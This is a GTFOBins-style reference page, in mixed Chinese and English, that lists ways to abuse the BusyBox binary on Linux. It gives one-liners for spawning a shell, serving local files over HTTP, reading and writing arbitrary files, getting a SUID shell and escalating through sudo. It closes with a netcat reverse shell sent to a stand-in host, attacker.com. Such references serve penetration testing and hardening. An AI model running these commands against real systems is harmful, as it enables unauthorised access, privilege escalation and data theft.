.. / busybox

BusyBox may contain many UNIX utilities, run busybox --list-full to check what GTFOBins binaries are supported. Here some example.

shell

用来生成一个交互式的系统shell。

上传文件到外部。

Serve files in the local folder running an HTTP server.
```
LPORT=12345
busybox httpd -f -p $LPORT -h .
```

将数据写入文件中。

LFILE=要写入的文件
busybox sh -c 'echo "DATA" > $LFILE'

从文件中读取数据。

LFILE=要读取的文件路径
./busybox cat "$LFILE"

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
```
./busybox sh
```

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

向监听的端口发送反向shell，以打开远程网络访问。

Run nc -lvp 12345 on the attacker box to receive the shell.

RHOST=attacker.com
RPORT=12345
busybox nc -e /bin/sh $RHOST $RPORT